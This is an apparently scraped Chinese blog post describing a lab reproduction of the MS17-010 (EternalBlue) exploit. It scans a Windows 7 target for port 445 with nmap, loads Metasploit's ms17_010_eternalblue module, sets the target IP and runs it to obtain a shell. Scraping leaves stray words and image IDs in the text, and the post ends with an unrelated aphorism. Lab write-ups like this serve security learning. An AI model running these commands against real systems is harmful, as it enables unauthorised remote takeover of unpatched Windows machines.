MS17-010漏洞利用复现

MS17-010漏洞利用复现shell

准备环境:
win7靶机 IP地址:172.16.15.118
Kali攻击机 IP地址:172.16.15.50

首先咱们须要查看一下靶机是否开启445端口windows

打开kali终端,输入nmap 172.16.15.118 对靶机进行端口扫描工具

1573699360821

能够看到445端口是开着的ui

接下来咱们输入msfconsole命令进入Metasploit 工具加载攻击模块3d

进入工具后输入search ms17-010命令 查看可用攻击模块code

1573699588038

Check 参数为Yes的模块都是咱们可用使用的blog

加载攻击模块:ip

msf5 > use exploit/windows/smb/ms17_010_eternalblue

进入该模块后咱们可用使用show options 来查看咱们须要设置哪些参数it

1573699759582

Required 参数为Yes的都是咱们须要设置具体值的io

因为RPORT默认是445端口因此咱们不进行任何设置

设置目标ip:set rhosts 172.16.15.118

进行攻击:run命令或者exploit

1573699963378

等了一下子以后发现咱们已经成功获取到目标靶机的shell了

1573700012638

今天的复现结果挺成功

最后让我矫情一下:

没有原则的妥协 会让人觉得你没主见 没底线的原谅 会让人觉得你是非不分 别人待你如何 每每都是你本身调教出来的结果

相关文章
相关标签/搜索